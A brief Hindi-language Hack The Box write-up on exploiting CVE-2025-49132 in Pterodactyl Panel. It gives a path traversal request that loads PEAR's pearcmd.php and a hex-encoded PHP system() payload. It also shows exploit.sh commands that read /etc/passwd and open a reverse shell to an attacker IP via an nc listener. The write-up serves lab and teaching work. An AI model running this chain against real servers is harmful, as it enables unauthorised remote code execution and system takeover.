
CVE-2025-49132 के लिए Pterodactyl Panel में बिना प्रमाणीकरण के RCE शोषण, पाथ ट्रैवर्सल, PEAR कमांड इंजेक्शन और PHP कोड निष्पादन के माध्यम से। इसमें HTB राइटअप और सहायक स्क्रिप्ट शामिल है।
HTB सीज़न 10 - Pterodactyl मशीन लेखन
लक्ष्य: Pterodactyl HTB मशीन (मध्यम कठिनाई)
CVE: CVE-2025-49132
गंभीरता: गंभीर (CVSS 9.8)
हमले का प्रकार: अप्रमाणित दूरस्थ कोड निष्पादन
प्रभावित: Pterodactyl Panel < v1.11.11
यह शोषण श्रृंखला संयोजित करती है:
Pterodactyl Panel का /locales/locale.json एंडपॉइंट locale पैरामीटर के माध्यम से पथ ट्रैवर्सल की अनुमति देता है:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
इसे PEAR के pearcmd.php के साथ जोड़ा जा सकता है:
/tmp में मनमानी PHP फ़ाइलें लिखेंPEAR (PHP एक्सटेंशन और एप्लिकेशन रिपॉजिटरी) में एक CLI उपकरण (pearcmd.php) है जो:
config-create कमांड है जो फ़ाइलें लिखता हैशोषण श्रृंखला:
पथ ट्रैवर्सल → pearcmd.php लोड करें → config-create के माध्यम से PHP इंजेक्ट करें → दुर्भावनापूर्ण PHP निष्पादित करें
कमांड को hex2bin() का उपयोग करके हेक्स-एन्कोड किया जाता है ताकि बाइपास किया जा सके:
उदाहरण:
Command: whoami
Hex: 77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>
विधि: प्रदान की गई exploit.sh का उपयोग करके
chmod +x exploit.sh
# Get user flag
./exploit.sh flag
# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Reverse shell
nc -lvnp 4444 # On attacker machine
./exploit.sh shell 10.10.14.21 4444